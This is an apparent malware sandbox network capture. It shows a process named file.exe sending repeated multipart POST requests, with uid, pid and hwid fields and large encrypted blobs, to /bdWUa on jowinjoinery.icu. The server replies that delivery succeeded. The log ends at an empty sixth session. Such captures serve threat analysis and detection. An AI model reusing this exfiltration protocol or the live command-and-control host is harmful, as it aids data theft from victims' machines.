2025-03-10 20:05:12 UTC | 15065 | OUT | Data Raw: 2d 2d 54 36 35 52 58 71 64 38 62 4b 79 68 35 32 32 72 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 32 36 65 38 63 35 31 37 33 36 34 66 31 31 64 61 37 30 62 61 61 30 61 34 36 65 34 32 37 35 32 32 66 32 36 63 63 36 64 0d 0a 2d 2d 54 36 35 52 58 71 64 38 62 4b 79 68 35 32 32 72 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 36 35 52 58 71 64 38 62 4b 79 68 35 32 32 72 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 33 30 34 34 34 43
                                                            Data Ascii: --T65RXqd8bKyh522r7Content-Disposition: form-data; name="uid"926e8c517364f11da70baa0a46e427522f26cc6d--T65RXqd8bKyh522r7Content-Disposition: form-data; name="pid"2--T65RXqd8bKyh522r7Content-Disposition: form-data; name="hwid"D930444C
2025-03-10 20:05:13 UTC | 817 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 10 Mar 2025 20:05:13 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IBBsiOUAe1lkiekMrz9N5hUXW7rh%2Fco5Iz%2BspqgEblBzlRk99lC3%2BSiHoXEAhAr1DJU5Mdk9EF2ivZx2fx1Kuw7ak%2BDExwKWsNRbSk9h7UtxwhUBINNDq8oJ3Ur5%2FLQUgQL3"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 91e56cf16955c9bb-IAD
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=7185&min_rtt=5466&rtt_var=2631&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2840&recv_bytes=16006&delivery_rate=431723&cwnd=190&unsent_bytes=0&cid=2687d9fc7868f047&ts=1419&x=0"
2025-03-10 20:05:13 UTC | 74 | IN | Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 39 36 2e 32 35 35 2e 35 38 2e 36 34 22 7d 7d 0d 0a
                                                            Data Ascii: 44{"success":{"message":"message success delivery from 96.255.58.64"}}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49715 | 188.114.97.3 | 443 | 8384 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-10 20:05:15 UTC | 280 | OUT | POST /bdWUa HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=M30gmTDPSn9qBw
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 20539
                                                            Host: jowinjoinery.icu
2025-03-10 20:05:15 UTC | 15331 | OUT | Data Raw: 2d 2d 4d 33 30 67 6d 54 44 50 53 6e 39 71 42 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 32 36 65 38 63 35 31 37 33 36 34 66 31 31 64 61 37 30 62 61 61 30 61 34 36 65 34 32 37 35 32 32 66 32 36 63 63 36 64 0d 0a 2d 2d 4d 33 30 67 6d 54 44 50 53 6e 39 71 42 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4d 33 30 67 6d 54 44 50 53 6e 39 71 42 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 33 30 34 34 34 43 45 41 35 45 46 32 31 37 45
                                                            Data Ascii: --M30gmTDPSn9qBwContent-Disposition: form-data; name="uid"926e8c517364f11da70baa0a46e427522f26cc6d--M30gmTDPSn9qBwContent-Disposition: form-data; name="pid"3--M30gmTDPSn9qBwContent-Disposition: form-data; name="hwid"D930444CEA5EF217E
2025-03-10 20:05:15 UTC | 5208 | OUT | Data Raw: dc 7f 89 4c f1 1d 84 ff 16 ed 4d b5 a4 88 ae 28 b3 93 fe 5c ea 7e 94 b5 d6 94 01 99 a9 e0 4b 5f e7 a5 ae a2 be 55 56 78 07 52 aa 7c 3e 4f 62 8d 99 8f 75 05 23 c1 f3 64 40 59 a4 61 7c 5f 9a 72 04 7b 06 76 0d fb 1e 52 bc 50 f0 d5 4e 5f 02 e6 67 c9 9a 24 70 53 aa 89 b9 33 e6 1f d9 cf 5a 08 6a a0 23 7b ff a3 b1 85 41 fc 9d ee 21 54 c8 18 70 e3 9b 3e 30 83 95 68 a6 29 81 fb 9e 39 cd 9b 5b fb 18 c9 57 9d 83 88 4a a8 fd a7 cd ec fa fd 10 d5 b2 23 4b 48 2b 28 57 f4 2c a2 8a b8 f7 d6 61 dc c4 e8 33 88 0c c2 35 16 86 a9 84 bb 7b 5a c8 5a 34 55 8d 9d 0c 8c e7 b1 92 fd cc a3 eb c4 c2 7a 41 37 73 eb 6c fb b4 b3 51 d2 aa d9 54 86 12 67 94 cc e6 8c d6 83 7c fe 3a ce a7 b7 29 26 1b d4 04 3e b9 74 96 50 4c ab c5 e2 96 4e fd ac 0c c3 8b d8 8c 65 a6 a1 29 54 8a e1 81 a9 4d
                                                            Data Ascii: LM(\~K_UVxR|>Obu#d@Ya|_r{vRPN_g$pS3Zj#{A!Tp>0h)9[WJ#KH+(W,a35{ZZ4UzA7slQTg|:)&>tPLNe)TM
2025-03-10 20:05:16 UTC | 813 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 10 Mar 2025 20:05:16 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lFuS95BGs5YT6gBxaej2opgcc47%2B58%2F5jeue4jeDwKsI86rIVsBY5NVkLdGQZVoqi4G%2BQLX6LuSXGED3ZfJGEP2RhSFZRQKXRCSlYp2qS2tVc2kRJFddWoSuC3XEwqpoHx3l"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 91e56d067f9dd6cf-IAD
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=9532&min_rtt=3310&rtt_var=5684&sent=17&recv=26&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21499&delivery_rate=633836&cwnd=242&unsent_bytes=0&cid=d32b1324138a2b98&ts=1083&x=0"
2025-03-10 20:05:16 UTC | 74 | IN | Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 39 36 2e 32 35 35 2e 35 38 2e 36 34 22 7d 7d 0d 0a
                                                            Data Ascii: 44{"success":{"message":"message success delivery from 96.255.58.64"}}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49716 | 188.114.97.3 | 443 | 8384 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-10 20:05:18 UTC | 283 | OUT | POST /bdWUa HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=4pWBcto75KHZXU9Gzy
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 2569
                                                            Host: jowinjoinery.icu
2025-03-10 20:05:18 UTC | 2569 | OUT | Data Raw: 2d 2d 34 70 57 42 63 74 6f 37 35 4b 48 5a 58 55 39 47 7a 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 32 36 65 38 63 35 31 37 33 36 34 66 31 31 64 61 37 30 62 61 61 30 61 34 36 65 34 32 37 35 32 32 66 32 36 63 63 36 64 0d 0a 2d 2d 34 70 57 42 63 74 6f 37 35 4b 48 5a 58 55 39 47 7a 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 70 57 42 63 74 6f 37 35 4b 48 5a 58 55 39 47 7a 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 33 30 34
                                                            Data Ascii: --4pWBcto75KHZXU9GzyContent-Disposition: form-data; name="uid"926e8c517364f11da70baa0a46e427522f26cc6d--4pWBcto75KHZXU9GzyContent-Disposition: form-data; name="pid"1--4pWBcto75KHZXU9GzyContent-Disposition: form-data; name="hwid"D9304
                                                            2025-03-10 20:05:19 UTC | 822 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 10 Mar 2025 20:05:19 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tNnGjj%2Fh%2B0CxIFQPykZ%2B5P92l2BOZPFdEd%2B3hpaz%2F5p6mGqciqEqbLpoZetcD%2Fe46QyI67uCcDBQpwMO86WcZGEdxJcaq6Th7y3OE%2BChcI1znmOf8Nrq2%2B4Azyfn8ZuyX%2BkW"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 91e56d198f97393a-IAD
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4988&min_rtt=4584&rtt_var=2031&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2841&recv_bytes=3488&delivery_rate=420319&cwnd=232&unsent_bytes=0&cid=5427016c3b0f777e&ts=1279&x=0"
                                                            2025-03-10 20:05:19 UTC | 74 | IN | Data Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 39 36 2e 32 35 35 2e 35 38 2e 36 34 22 7d 7d 0d 0a
                                                            Data Ascii: 44{"success":{"message":"message success delivery from 96.255.58.64"}}


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            5 | 192.168.2.5 | 49717 | 188.114.97.3 | 443 | 8384 | C:\Users\user\Desktop\file.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2025-03-10 20:05:22 UTC | 279 | OUT | POST /bdWUa HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=2wCq2c1eu0zJ
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 569809
                                                            Host: jowinjoinery.icu
                                                            2025-03-10 20:05:22 UTC | 15331 | OUT | Data Raw: 2d 2d 32 77 43 71 32 63 31 65 75 30 7a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 39 32 36 65 38 63 35 31 37 33 36 34 66 31 31 64 61 37 30 62 61 61 30 61 34 36 65 34 32 37 35 32 32 66 32 36 63 63 36 64 0d 0a 2d 2d 32 77 43 71 32 63 31 65 75 30 7a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 77 43 71 32 63 31 65 75 30 7a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 39 33 30 34 34 34 43 45 41 35 45 46 32 31 37 45 33 45 44 43 45 41
                                                            Data Ascii: --2wCq2c1eu0zJContent-Disposition: form-data; name="uid"926e8c517364f11da70baa0a46e427522f26cc6d--2wCq2c1eu0zJContent-Disposition: form-data; name="pid"1--2wCq2c1eu0zJContent-Disposition: form-data; name="hwid"D930444CEA5EF217E3EDCEA
                                                            2025-03-10 20:05:22 UTC | 15331 | OUT | Data Raw: 7b 7e 57 4e 70 f0 0c 53 7d cb de f2 ba 6c 6d d2 8a ec 25 8b eb e1 1e c4 17 2a 6a b3 7e c1 d3 3c dd d3 61 0a 70 ca b5 57 f0 2c 3b 63 c5 ca 13 cd 10 f8 af 1a d0 08 22 16 5f 90 5f ae 7b 3e 92 0c 95 c3 73 b5 a9 55 57 ed 71 0a 00 20 40 15 20 fd 7b f1 31 f1 8d b1 d4 80 b1 3e 08 c2 ac 81 e8 e1 97 41 b8 6e 6c 81 aa 87 ff f2 7b d8 d6 e6 b8 ba cb d6 9e f5 7b 50 df 6e e4 04 34 0a e1 1e db f3 e4 79 ae f8 9b ce 49 7f 6c 47 c9 dd df ef 9a fa 13 07 93 48 f3 6a 56 4f ff 24 f4 c9 b3 d0 21 ad ed 0f 83 ca ba 3e 71 11 42 13 ce 83 68 b4 3c 36 5f fd e7 75 14 29 bb 26 93 06 74 5c a2 94 3e de 0f 6e ff 52 72 fe 61 83 ba dc c9 27 44 c8 91 5e c0 27 5e 9d 15 06 b6 60 c8 f7 de 5c 9b eb ff ee 66 88 8c 69 a8 5c 0c 13 31 35 8d 84 5b b3 a6 52 34 54 d6 6b 47 04 42 72 5b 9e 09 a8 c7 d2 77
                                                            Data Ascii: {~WNpS}lm%*j~<apW,;c"__{>sUWq @ {1>Anl{{Pn4yIlGHjVO$!>qBh<6_u)&t\>nRra'D^'^`\fi\15[R4TkGBr[w
                                                            2025-03-10 20:05:22 UTC | 15331 | OUT | Data Raw: c5 3e e0 87 6f 7a 1f 19 2a 5d 59 99 78 aa 12 c4 6a bf 24 7b be ae af 21 7e 63 85 7d 3d b9 78 9a 53 2e eb bf 69 96 8b 75 1d b5 5b 26 9b 64 f7 c0 ef 19 a1 ad 48 25 3a 07 66 97 97 80 29 e0 af 60 3e 6f 25 63 15 cd 90 ef 8f f3 86 56 df a1 9d a8 c5 0e ab 7f ce e8 6d 64 f9 1b 4d 77 f3 4f 0a 90 bb b0 00 e9 59 ca fa a9 91 99 5e ec 55 f8 7c 3f 14 2d 3b aa 78 c1 12 45 75 0c e8 e6 77 dd 65 7d c6 bd e2 ff c0 8d 62 e9 3e 66 d1 43 d9 92 b1 6f bb 1e 2f 22 d1 66 b0 9e ae a9 9b 99 69 53 1c a1 2b f1 66 f5 da 16 3d 2e 60 1b 5a 46 ef 72 92 f0 a6 c4 28 bd 78 0a 6c 36 2c e7 21 36 02 bc 28 3b 13 a5 98 8c 2d 95 7a 9b a6 08 03 64 3b 23 ff 53 bb 36 f9 5d f5 09 d2 f1 56 7c 09 fc da 89 c6 7b 1a 18 90 a6 d6 bd c6 3c 75 e6 44 17 3d f5 cf 66 d6 65 6f 7f 7b eb 2a 0e 20 5c f8 70 38 f6 1e
                                                            Data Ascii: >oz*]Yxj${!~c}=xS.iu[&dH%:f)`>o%cVmdMwOY^U|?-;xEuwe}b>fCo/"fiS+f=.`ZFr(xl6,!6(;-zd;#S6]V|{<uD=feo{* \p8
                                                            2025-03-10 20:05:22 UTC | 15331 | OUT | Data Raw: 4a 11 ce 14 2d 78 6c 74 03 73 d0 7e 25 d3 9c 33 cc da 3d 53 a9 ef c2 ea 45 3a fc 69 9c 46 7d d2 01 6d 0c 7d 90 01 e1 57 7e 27 48 80 9f de e5 56 ee 21 75 7a fb 70 11 b0 dc 6e bc 50 19 cd b5 25 16 cb e5 68 0c 01 7b 15 4f 0b cd 11 66 05 bb 61 26 d4 f3 f9 c3 d1 2f 7a 64 4a 4b b6 d1 a6 49 d3 38 78 3d 9b f8 e2 39 62 b6 03 62 c4 30 81 30 42 b2 22 01 f3 b5 c5 24 60 85 4b 9b 90 26 14 d1 78 b9 05 1a 98 c2 6c c6 06 da 13 6e 92 c8 c0 b8 55 85 44 0b 96 0b fd ba 2c 23 bb 78 11 56 92 19 77 9f 71 91 72 22 f7 40 58 52 f2 e8 cf ca 35 85 b4 b5 e5 ed 1e 6f 42 10 3e 83 40 a8 a0 a6 dc 83 bb e6 fe 48 56 69 e0 55 f8 fe 59 c3 b3 51 ed 53 5b f9 82 df b4 7c 45 bd 57 75 0a 2e a5 5d b4 d5 e4 3d ef c4 f9 7d 12 2f d9 3f 23 0b 99 15 2b 84 7c ea f1 84 c6 d7 9f 26 e8 bd cc dd 56 3a d7 e5
                                                            Data Ascii: J-xlts~%3=SE:iF}m}W~'HV!uzpnP%h{Ofa&/zdJKI8x=9bb00B"$`K&xlnUD,#xVwqr"@XR5oB>@HViUYQS[|EWu.]=}/?#+|&V:
                                                            2025-03-10 20:05:22 UTC | 15331 | OUT | Data Raw: 62 f8 9e f0 bf 86 b6 84 dd 2e 8c 76 8d 5e 93 43 97 14 e5 d2 c7 de 5d 38 02 9e b9 6c f9 34 7a 09 79 c3 d5 7c f7 35 6d 7d e6 78 82 9f 42 43 41 bb 91 31 3e 4d e7 ea 85 fd e4 6f e1 2c 2f 08 28 81 a5 89 91 ca 8e 0c 37 cb 42 fc e3 4c fe 74 10 f2 bc 2e 3d 26 5b a5 c3 0e f3 18 f2 93 f4 d6 29 61 91 21 63 e1 05 30 55 37 78 24 3d e3 f6 e4 ae 47 b4 f3 71 f2 40 69 1c 07 08 57 f1 04 2a 72 e1 53 4a 3a d2 23 98 0d fc 40 93 1b 5e d6 5a 61 87 31 c9 7a 85 5f 2e bb 4a 11 12 38 85 4f 80 f6 b1 4f 0a 55 e8 87 b6 10 1b 97 c9 29 f6 b0 4f 19 7c 82 da fa 8e e0 c6 0e 13 e2 05 fa b1 72 44 78 53 98 4c 93 b6 d4 95 20 9b 11 60 99 ae de 41 20 80 8f d8 8f 7a 6d 7c 40 cb 24 13 5a e2 0d bf 81 82 d5 34 24 cc 1b b0 95 4b 43 40 15 41 ba 3d 20 0c ec 71 2f 53 7b fa a7 dd cc 4d 06 72 d6 bf ca 63
                                                            Data Ascii: b.v^C]8l4zy|5m}xBCA1>Mo,/(7BLt.=&[)a!c0U7x$=Gq@iW*rSJ:#@^Za1z_.J8OOU)O|rDxSL `A zm|@$Z4$KC@A= q/S{Mrc
                                                            2025-03-10 20:05:22 UTC | 15331 | OUT | Data Raw: f9 96 cd 2b 3a 82 e1 42 60 45 80 bc 42 be 40 1f 12 22 77 66 88 6e 6a a8 7b 7f eb f9 71 89 27 a7 6a 48 54 4e b3 d0 74 cf 49 79 e1 90 3a 3d 4e 5e 3d 56 67 30 f9 96 62 12 a5 70 14 f6 d7 fa 6f 1e 9a ed 98 fd 43 24 9b 77 87 99 3b 64 8f 9a b3 e1 ff c7 5f 2e 97 a6 5c fc a3 97 07 30 ff c7 0f 02 e2 da e8 3b ee 6b 97 cc b3 7e a8 cd 1f 5d 4b fe df d2 64 2e 91 e0 e9 bd 9c 2a c0 79 10 da 78 85 f2 85 63 9b ce 4b 7f 2c 8e ff 86 9b a3 9e c1 37 11 c8 13 0c 69 47 d7 dd f3 f8 75 ee 35 59 fd 3b 04 cf 6f 5e b1 24 3b 6b bf c3 a0 ef 98 79 f4 23 b4 8d 18 dc d5 2f 2a 72 25 be f9 2e 95 90 6e ef 39 53 e0 83 26 ea 54 51 67 b4 f5 15 eb 0e 1c 1b ca 46 99 e8 41 53 9e 13 db fb 09 a5 f2 19 92 6f f9 4e cf 95 bd 3a 37 a6 93 ea 2f ac 1a f6 f3 2d 1e 3e c8 5a d2 37 e4 21 8b b9 e7 4c 5a 57 d9
                                                            Data Ascii: +:B`EB@"wfnj{q'jHTNtIy:=N^=Vg0bpoC$w;d_.\0;k~]Kd.*yxcK,7iGu5Y;o^$;ky#/*r%.n9S&TQgFASoN:7/->Z7!LZW
                                                            2025-03-10 20:05:22 UTC | 15331 | OUT | Data Raw: fc 67 27 11 92 a5 eb 4e 17 c5 18 b1 59 52 7b e5 90 24 a8 9d 9b 3d d0 4d 05 2d 08 d2 8d ae b9 1b 47 7c 8b 30 08 be 21 7a 97 73 5e 14 82 37 1c 1a 70 b0 84 97 6d 07 3f 55 86 f5 72 a6 8e 78 ae a7 29 dd cc d1 5c 3f 11 a9 8a 03 87 14 e9 b4 d9 1f 46 2f cc ce 7f 73 83 fa 7b be 47 3c 17 e6 18 f3 78 05 ed 16 f1 ff c5 c9 06 ed e6 d1 dd 42 4a f4 4c 3d e2 6a a1 4a 64 ba 32 0e b3 c7 ce b5 5f 5e de d9 db 44 3e ec a8 58 ba 7a ad 97 ee db 21 9f 98 79 0b ed 2d 52 93 29 66 87 a6 1d af dc 2d 30 37 6e fb 4b fa eb c0 52 62 62 b7 72 5e 70 fe da 2f 30 b3 d7 91 87 c9 d9 e0 8a 83 b2 d1 af 22 3e a4 01 2a 07 45 35 ca a8 6a 5f c8 83 38 04 2c 05 fc 2e fd 60 b8 f7 34 f0 4e eb 02 78 f8 de ae f3 cb ea 8f cc e7 b0 06 04 1b 1f 75 35 53 5e b2 50 4c 71 db 43 81 68 ee 06 a9 ea 58 9f 02 21 e9
                                                            Data Ascii: g'NYR{$=M-G|0!zs^7pm?Urx)\?F/s{G<xBJL=jJd2_^D>Xz!y-R)f-07nKRbbr^p/0">*E5j_8,.`4Nxu5S^PLqChX!
                                                            2025-03-10 20:05:22 UTC | 15331 | OUT | Data Raw: 37 62 09 13 b4 3b bc 88 b0 fd 2e 9e 3b 02 1d be c9 97 1f 02 0f c2 43 b3 17 43 e4 01 0b 24 d0 7b 58 3c 09 1a dc 55 df 5b 6f ee 1b 2f 2d 99 cf ea 13 ca 5a 02 39 b1 06 8c 65 70 eb 4e 07 ee bb da b1 27 84 f4 cd ad 09 32 a0 b1 28 6e 8f e8 d9 e3 e4 47 85 96 9d 32 9d b5 09 82 6a 14 17 4a 69 74 c5 8b 59 55 96 36 f1 b9 bf 13 c4 a1 b1 08 12 22 fc 57 01 cb 95 28 6b 38 64 18 ba 7a 75 cd a1 25 d5 28 40 4f c6 85 a7 06 c9 81 d6 14 6e b3 3f 97 c0 93 2d 12 a8 39 28 a4 64 f6 51 61 fa c4 f7 e9 6a 2f cd 3d 3f b8 a1 8b 8e 39 36 8e 97 83 af ec d3 e9 92 0d 14 46 b9 33 d7 d8 e0 73 11 8d c7 e4 47 2f fe 05 f8 23 75 b1 21 47 1a 97 45 e6 39 86 ae 19 72 ee 04 80 72 e6 19 36 1d 59 4e d1 a0 0c 9d f1 6d 52 c3 6e 0b 6a d9 06 43 bd ec 73 80 0e 2f 0d cd 53 17 77 3d 62 45 f2 89 bc d3 22 25
                                                            Data Ascii: 7b;.;CC${X<U[o/-Z9epN'2(nG2jJitYU6"W(k8dzu%(@On?-9(dQaj/=?96F3sG/#u!GE9rr6YNmRnjCs/Sw=bE"%
                                                            2025-03-10 20:05:22 UTC | 15331 | OUT | Data Raw: 6c 45 d4 ea 34 0d 2e 5b 19 a2 11 e8 6a 6f d1 c5 35 1c f3 ee ac 03 18 e3 8c 35 98 ef bc c2 80 84 9c f9 90 51 67 99 9e 41 ac 6e 90 d5 4b 03 d2 6c 08 2b ae 40 0a 3f 58 fc cd bd 64 b1 06 09 7b 16 2c 17 ba 47 9f a3 85 f6 88 5c 1c dd f3 ad 62 46 9f 29 28 1e 67 c8 97 82 37 ce a7 a9 f6 dd 3b e2 4f b6 74 38 1e 9c 11 f0 94 c5 d0 83 87 1f 63 7d fc 0b bb 1e 0d 80 eb bd b2 6e a4 2e ca 8f ff 12 da 85 89 f1 19 65 cb 5e c0 6f 7b 47 aa ad f0 b0 73 14 29 89 66 6a d3 a1 14 28 6e f5 b7 9e 13 d7 6f df 43 a9 0b 30 cb bc c6 f6 33 01 8c d1 7f da 90 f4 64 14 a0 0f ed dd 32 c1 be 4f 8a 4e 32 6c d3 49 9c 97 b9 75 e0 38 63 96 2f 9c b2 49 7a ce 6a 00 8d bf 05 1b de c1 18 56 d2 2c 4b f5 cc cb 2d ef e0 58 c3 bf 73 a8 76 bf a4 c6 3f 3f 4e 64 ee cb c7 aa 07 51 ae f6 2b c5 2c 8c d3 8a 0e
                                                            Data Ascii: lE4.[jo55QgAnKl+@?Xd{,G\bF)(g7;Ot8c}n.e^o{Gs)fj(noC03d2ON2lIu8c/IzjV,K-Xsv??NdQ+,
                                                            2025-03-10 20:05:22 UTC | 15331 | OUT | Data Raw: 51 0b 3f 14 d8 5c e6 8f f0 91 37 b2 fc cb 8c 04 58 c6 62 8b 74 89 0b b4 58 dc 69 f3 00 7b c8 7d 94 9d 43 8b d7 49 89 8f 99 70 1c c8 ea 08 f5 8f 16 73 e8 40 c0 65 7e 82 26 16 35 c9 c0 ce 7d ca 7f c3 0d 5a 68 da 59 c8 91 6e 8f 59 72 67 90 e7 bf 93 37 bb 1b f1 cd 40 a4 21 22 e3 c3 1a d3 20 14 b2 11 09 06 9a e8 b5 c0 16 8f 29 95 d0 6b e6 0e 97 2e ba 2f d8 6b 64 63 aa fa 3c f1 14 ce 65 fe 95 eb 80 d1 02 3e d2 a9 8b d5 dd a1 05 9a 3f 1f f5 f3 be 0e 6f 3f 4c f2 55 8f 5b 32 78 15 6d d0 5c 1c 97 65 3f 54 51 b9 78 60 06 29 d1 8c 9e d5 6c a2 a2 3a 90 61 43 d2 f2 92 af d3 ab 63 c7 8a 75 c2 2c a3 c3 82 b6 4f 14 59 90 3d f9 15 a7 1d c6 3b f7 de 72 36 cc 99 95 16 07 d3 96 08 b6 99 55 29 12 5c a4 5d db 19 8d 43 a9 32 df 69 b4 b3 f8 05 9c 95 f8 8b a9 a9 f6 b8 24 5a cc f2
                                                            Data Ascii: Q?\7XbtXi{}CIps@e~&5}ZhYnYrg7@!" )k./kdc<e>?o?LU[2xm\e?TQx`)l:aCcu,OY=;r6U)\]C2i$Z
                                                            2025-03-10 20:05:26 UTC | 818 | IN | HTTP/1.1 200 OK
                                                            Date: Mon, 10 Mar 2025 20:05:25 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WsKr82qEQ5TlsOwt8LvAf0izbAvPXb3IDFr%2BJgBihi9BhgEAbgCLz%2FUrnB3ZXjwA1xLmRpHY4W55VCHSWPeHTwFUTgKj%2B2bfqJThVCimhO9V%2FtRYLByRehEYHzEQsIoHISwS"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 91e56d320f382087-IAD
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4793&min_rtt=4780&rtt_var=1353&sent=275&recv=449&lost=0&retrans=0&sent_bytes=2840&recv_bytes=572352&delivery_rate=604592&cwnd=212&unsent_bytes=0&cid=b3c4cd26de3c362a&ts=3641&x=0"


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            6 | 192.168.2.5 | 49718 | 188.114.97.3 | 443 | 8384 | C:\Users\user\Desktop\file.exe
                                                            Timestamp | Bytes transferred | Direction | Data
